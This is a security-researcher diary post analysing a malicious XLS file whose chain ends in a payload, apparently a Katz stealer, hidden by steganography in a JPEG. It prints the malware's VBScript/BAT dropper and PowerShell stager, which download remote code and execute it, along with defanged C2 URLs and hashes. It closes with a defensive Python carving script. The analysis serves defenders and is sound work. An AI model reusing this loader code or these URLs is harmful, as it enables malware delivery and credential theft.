[More Steganography!](/forums/diary/More+Steganography/32044/)
==============================================================

**Published**: 2025-06-14. **Last Updated**: 2025-06-14 07:19:40 UTC **by** [Xavier Mertens](/handler_list.html#xavier-mertens) (Version: 1)

I spotted another interesting file that uses, once again, steganography. It seems to be a trend (see one of my previous diaries [[1](https://isc.sans.edu/diary/A+PNG+Image+With+an+Embedded+Gift/31998)]). The file is a malicious Excel sheet called blcopy.xls. Malicious Office documents are rare these days because Microsoft tightened the rules governing automatic macro execution [[2](https://learn.microsoft.com/en-us/microsoft-365-apps/security/internet-macros-blocked)]. But that does not mean that Office documents can't execute malicious code.
In the sample I found (SHA256: c92c761a4c5c3f44e914d6654a678953d56d4d3a2329433afe1710b59c9acd3a), there are other embedded XLS sheets:

```
remnux@remnux:~/malwarezoo/20250611$ oledump.py blcopy.xls
  1:       114 '\x01CompObj'
  2:       244 '\x05DocumentSummaryInformation'
  3:       200 '\x05SummaryInformation'
  4:       114 'MBD012124E0/\x01CompObj'
  5:       448 'MBD012124E0/\x05DocumentSummaryInformation'
  6:     27016 'MBD012124E0/\x05SummaryInformation'
  7:       114 'MBD012124E0/MBD008FCB33/\x01CompObj'
  8:     68088 'MBD012124E0/MBD008FCB33/Package'
  9:       114 'MBD012124E0/MBD008FD33C/\x01CompObj'
 10:       652 'MBD012124E0/MBD008FD33C/\x05DocumentSummaryInformation'
 11:     30228 'MBD012124E0/MBD008FD33C/\x05SummaryInformation'
 12:    218567 'MBD012124E0/MBD008FD33C/Workbook'
 13:       114 'MBD012124E0/MBD008FDB50/\x01CompObj'
 14:    111781 'MBD012124E0/MBD008FDB50/Package'
 15:       114 'MBD012124E0/MBD008FED44/\x01CompObj'
 16:    408066 'MBD012124E0/MBD008FED44/Package'
 17:    373246 'MBD012124E0/Workbook'
 18:       716 'MBD012124E1/\x01Ole'
 19:    442912 'Workbook'
 20:       525 '_VBA_PROJECT_CUR/PROJECT'
 21:       104 '_VBA_PROJECT_CUR/PROJECTwm'
 22: m     977 '_VBA_PROJECT_CUR/VBA/Sheet1'
 23: m     977 '_VBA_PROJECT_CUR/VBA/Sheet2'
 24: m     977 '_VBA_PROJECT_CUR/VBA/Sheet3'
 25: m     985 '_VBA_PROJECT_CUR/VBA/ThisWorkbook'
 26:      2644 '_VBA_PROJECT_CUR/VBA/_VBA_PROJECT'
 27:       553 '_VBA_PROJECT_CUR/VBA/dir'
remnux@remnux:~/malwarezoo/20250611$ oledump.py blcopy.xls -s 14 -d | zipdump.py
Index Filename                                  Encrypted Timestamp
    1 [Content_Types].xml                               0 1980-01-01 00:00:00
    2 _rels/.rels                                       0 1980-01-01 00:00:00
    3 xl/_rels/workbook.xml.rels                        0 1980-01-01 00:00:00
    4 xl/workbook.xml                                   0 1980-01-01 00:00:00
    5 xl/worksheets/sheet4.xml                          0 1980-01-01 00:00:00
    6 xl/worksheets/_rels/sheet5.xml.rels               0 1980-01-01 00:00:00
    7 xl/worksheets/_rels/sheet4.xml.rels               0 1980-01-01 00:00:00
    8 xl/worksheets/_rels/sheet3.xml.rels               0 1980-01-01 00:00:00
    9 xl/worksheets/_rels/sheet2.xml.rels               0 1980-01-01 00:00:00
   10 xl/worksheets/_rels/sheet1.xml.rels               0 1980-01-01 00:00:00
   11 xl/worksheets/sheet2.xml                          0 1980-01-01 00:00:00
   12 xl/worksheets/_rels/sheet6.xml.rels               0 1980-01-01 00:00:00
   13 xl/worksheets/_rels/sheet7.xml.rels               0 1980-01-01 00:00:00
   14 xl/worksheets/_rels/sheet8.xml.rels               0 1980-01-01 00:00:00
   15 xl/worksheets/_rels/sheet13.xml.rels              0 1980-01-01 00:00:00
   16 xl/worksheets/_rels/sheet12.xml.rels              0 1980-01-01 00:00:00
   17 xl/worksheets/_rels/sheet11.xml.rels              0 1980-01-01 00:00:00
   18 xl/worksheets/_rels/sheet10.xml.rels              0 1980-01-01 00:00:00
   19 xl/worksheets/_rels/sheet9.xml.rels               0 1980-01-01 00:00:00
   20 xl/worksheets/sheet3.xml                          0 1980-01-01 00:00:00
   21 xl/worksheets/sheet1.xml                          0 1980-01-01 00:00:00
   22 xl/styles.xml                                     0 1980-01-01 00:00:00
   23 xl/worksheets/sheet11.xml                         0 1980-01-01 00:00:00
   24 xl/worksheets/sheet12.xml                         0 1980-01-01 00:00:00
   25 xl/worksheets/sheet13.xml                         0 1980-01-01 00:00:00
   26 xl/theme/theme1.xml                               0 1980-01-01 00:00:00
   27 xl/sharedStrings.xml                              0 1980-01-01 00:00:00
   28 xl/worksheets/sheet10.xml                         0 1980-01-01 00:00:00
   29 xl/worksheets/sheet8.xml                          0 1980-01-01 00:00:00
   30 xl/worksheets/sheet5.xml                          0 1980-01-01 00:00:00
   31 xl/worksheets/sheet6.xml                          0 1980-01-01 00:00:00
   32 xl/worksheets/sheet7.xml                          0 1980-01-01 00:00:00
   33 xl/worksheets/sheet9.xml                          0 1980-01-01 00:00:00
   34 xl/printerSettings/printerSettings5.bin           0 1980-01-01 00:00:00
   35 xl/printerSettings/printerSettings4.bin           0 1980-01-01 00:00:00
   36 xl/printerSettings/printerSettings2.bin           0 1980-01-01 00:00:00
   37 xl/printerSettings/printerSettings6.bin           0 1980-01-01 00:00:00
   38 xl/printerSettings/printerSettings7.bin           0 1980-01-01 00:00:00
   39 xl/printerSettings/printerSettings8.bin           0 1980-01-01 00:00:00
   40 xl/printerSettings/printerSettings9.bin           0 1980-01-01 00:00:00
   41 xl/printerSettings/printerSettings10.bin          0 1980-01-01 00:00:00
   42 xl/printerSettings/printerSettings11.bin          0 1980-01-01 00:00:00
   43 xl/printerSettings/printerSettings12.bin          0 1980-01-01 00:00:00
   44 xl/printerSettings/printerSettings13.bin          0 1980-01-01 00:00:00
   45 xl/printerSettings/printerSettings3.bin           0 1980-01-01 00:00:00
   46 xl/printerSettings/printerSettings1.bin           0 1980-01-01 00:00:00
   47 docProps/thumbnail.wmf                            0 1980-01-01 00:00:00
   48 docProps/core.xml                                 0 1980-01-01 00:00:00
   49 docProps/app.xml                                  0 1980-01-01 00:00:00
```

Let's focus on the payload downloaded by this file:

```
hxxp://107[.]172[.]235[.]203/245/wecreatedbestsolutionswithniceworkingskill.hta
```

This HTA file will generate a BAT file (`C:\Windows\Temp\invertase.bat`) that will generate and execute a VBS file (`C:\Windows\Temp\poikilohydric.vbs`):

```vbscript
Dim adarme
Set adarme = CreateObject("WScript.Shell")
Dim bondwoman
bondwoman = "C:\Windows\Temp\invertase.bat"
Dim leucanthemum, methylamines
Set leucanthemum = CreateObject("Scripting.FileSystemObject")
Set methylamines = leucanthemum.CreateTextFile(bondwoman, True)
' Each WriteLine adds one line to the BAT file; the BAT in turn echoes the VBS into %fugues%
methylamines.WriteLine "@echo off"
methylamines.WriteLine "setlocal"
methylamines.WriteLine "set ""fugues=C:\Windows\Temp\poikilohydric.vbs"""
methylamines.WriteLine "echo Dim morasses, raconteur > ""%fugues%"""
' The reversed, '@'-padded string below is the next-stage URL
methylamines.WriteLine "echo morasses = Replace(StrReverse(""0@/@b@j@l@A@h@f@i@t@/@d@/@e@e@.@e@t@s@a@p@/@/@:@p@t@t@h@""), ""@"", """") >> ""%fugues%"""
methylamines.WriteLine "echo Set raconteur = CreateObject(""MSXML2.ServerXMLHTTP"") >> ""%fugues%"""
methylamines.WriteLine "echo raconteur.open ""GET"", morasses, False >> ""%fugues%"""
methylamines.WriteLine "echo raconteur.send >> ""%fugues%"""
methylamines.WriteLine "echo If raconteur.Status = 200 Then >> ""%fugues%"""
methylamines.WriteLine "echo ExecuteGlobal raconteur.responseText >> ""%fugues%"""
methylamines.WriteLine "echo End If >> ""%fugues%"""
methylamines.WriteLine "start """" /b wscript //nologo ""%fugues%"""
methylamines.WriteLine "timeout /t 1 /nobreak >nul"
methylamines.WriteLine "del ""%fugues%"""
methylamines.WriteLine "endlocal"
methylamines.Close
adarme.Run "cmd.exe /c """ & bondwoman & """", 0, False
window.close
```

The generated VBS file will fetch the next payload from the following URL:

```
hxxp://paste[.]ee/d/tifhAljb/0
```

This URL will fetch a long VBA script (SHA256: 352ef6f5c4568d6ed6a018a5128cf538d33ea72bd040f0fd3b9bca6bd6a5dae9) that will generate a PowerShell script and execute it:

```powershell
$SuperSkills='SilentlyContinue';
$preparsed='hxxps://zynova[.]kesug[.]com/new_image.jpg';
$thysanurous=New-Object System.Net.WebClient;
$thysanurous.Headers.Add('User-Agent','Mozilla/5.0');
[byte[]]$phytoestrogens=$thysanurous.DownloadData($preparsed);
$septentrions=[System.Text.Encoding]::UTF8.GetString($phytoestrogens);
# Delimiters of the payload hidden in the image
$incunabula='INICIO>>';
$prescience='<>';
$madrina=$newsbot;
$nectaries=$septentrions.IndexOf($incunabula);
$fiftysomethings=$septentrions.IndexOf($prescience);
if($nectaries -ne -1 -and $fiftysomethings -ne -1 -and $fiftysomethings -gt $nectaries){
    $nectaries+=$incunabula.Length;
    $madrina=$septentrions.Substring($nectaries,$fiftysomethings-$nectaries)
};
# Reversed URL with 't' replaced by '#'
$dachshunds='war/EP#7afLl/ppa.yfe#sap//:sp##h';
$dachshunds=$dachshunds.Replace('#','t');
# Undo the '@'-for-'A' substitution, Base64-decode and load the .NET assembly
$madrina=$madrina.Replace('@','A');
$nonassessable=[System.Convert]::FromBase64String($madrina);
$narratology=[Reflection.Assembly]::Load($nonassessable);
$toxodont=[dnlib.IO.Home].GetMethod('VAI').Invoke($newsbot,[object[]]@($dachshunds,'','','','aspnet_compiler','','','','','C:\Users\Public\Downloads','maungy','vbs','','','lygzeid','2',''));
```

That's where the steganography happens! The technique used by the attacker is to add a malicious payload to the picture, delimited by the tags `INICIO>>` and `<>`:

```
remnux@remnux:~/malwarezoo/20250611$ grep -a -A 3 'INICIO' new_image.jpg | more
N@?2?Sd?A??#*a?$?+!?w?$?2d8$?
m??K>TVqQ@@M@@@@E@@@@//8@@Lg@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@@4fug4@t@nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ@@@@@@@@@BQRQ@@T@ED@ExVKLM@@@@@@@@@@O@@DiEL@T@@@Fg1@@@I@@@@@@@@znY1@@@g@@@@gDU@@@B@@@@g@@@@@g@@B@@@@@@@@@@G@@@@@@@@@@D@NQ@@@g@@@@@@@@M@YIU@@B@@@B@@@@@@E@@@E@@@@@@@@@8@@@@@@@@@@@@@@IB2NQBL@@@@@I@1@P@F@@@@@@@@@@@@@@@@@@@@@@@@@K@1@@w@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@I@@@C@@@@@@@@@@@@@@@CC@@@Eg@@@@@@@@@@@@@@C50ZXh0@@@@1FY1@@@g@@@@WDU@@@I@@@@@@@@@@@@@@@@@@C@@@G@ucnNyYw@@@P@F@@@@gDU@@@Y@@@BaNQ@@@@@@@@@@@@@@@@B@@@B@LnJlbG9j@@@M@@@@@K@1@@@C@@@@YDU@@@@@@@@@@@@@@@@@Q@@@
```

Can you spot the interesting magic bytes? They were highlighted in red in the original diary: `TVqQ` is the Base64 encoding of the `MZ` header, and `VGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu` decodes to "This program cannot be run in DOS mode." They indicate the presence of a Base64-encoded PE file! Note also the `@` characters standing in for `A`, which the PowerShell script reverts with its `Replace('@','A')`.

The decoded and deobfuscated payload is a DLL that is loaded and executed! (SHA256: 5a73927d56c0fd4a805489d5817e1aa4fbd491e5a91ed36f4a2babef74158912). It seems to be a Katz stealer. Now you have more fresh meat to analyze!

[1] https://isc.sans.edu/diary/A+PNG+Image+With+an+Embedded+Gift/31998
[2] https://learn.microsoft.com/en-us/microsoft-365-apps/security/internet-macros-blocked

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
[PGP Key](https://keybase.io/xme/key.asc)

Keywords: [HTA](/tag.html?tag=HTA) [Katz](/tag.html?tag=Katz) [Malware](/tag.html?tag=Malware) [Payload](/tag.html?tag=Payload) [Steganography](/tag.html?tag=Steganography) [VBS](/tag.html?tag=VBS) [XLS](/tag.html?tag=XLS)
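The carving step the PowerShell stager performs on the image (take the text between `INICIO>>` and `<>`, restore `A` from `@`, Base64-decode) reimplemented as a defender-side triage script that also validates the result against the MZ/PE headers. This is an added example, not code from the diary or from the malware; the JPEG bytes and the minimal PE stub it embeds are constructed stand-ins, not the real new_image.jpg or the dropped DLL.

```python
import base64
import struct
from typing import Optional

START_TAG = b"INICIO>>"   # delimiters used by the stager quoted in the diary
END_TAG = b"<>"

def carve_payload(blob: bytes) -> Optional[bytes]:
    """Return the bytes between the two tags, or None if either tag is missing."""
    start = blob.find(START_TAG)
    if start == -1:
        return None
    start += len(START_TAG)
    end = blob.find(END_TAG, start)
    return None if end == -1 else blob[start:end]

def deobfuscate(carved: bytes) -> bytes:
    """Undo the stager's trick ('@' stands for 'A'), drop whitespace, Base64-decode."""
    text = b"".join(carved.replace(b"@", b"A").split())
    text += b"=" * (-len(text) % 4)          # tolerate stripped padding
    return base64.b64decode(text, validate=True)

def looks_like_pe(data: bytes) -> bool:
    """MZ magic plus an e_lfanew that points at the 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def extract_embedded_pe(image: bytes) -> Optional[bytes]:
    carved = carve_payload(image)
    if carved is None:
        return None
    try:
        data = deobfuscate(carved)
    except ValueError:                        # garbage between the tags (binascii.Error is a ValueError)
        return None
    return data if looks_like_pe(data) else None

def _fake_pe() -> bytes:
    # Constructed stand-in for the dropped DLL: a DOS header whose e_lfanew points at 'PE\0\0'.
    header = bytearray(0x40)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)
    return bytes(header) + b"PE\x00\x00" + b"\x00" * 20

# Constructed sample: JPEG-looking bytes with the obfuscated payload appended, as in new_image.jpg.
SAMPLE_IMAGE = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32 + b"\xff\xd9"
                + START_TAG + base64.b64encode(_fake_pe()).replace(b"A", b"@") + END_TAG)
```

Running `extract_embedded_pe` over a suspect image returns the decoded PE bytes (ready to hash or to hand to a .NET disassembler) or None when nothing between the tags decodes to a valid PE.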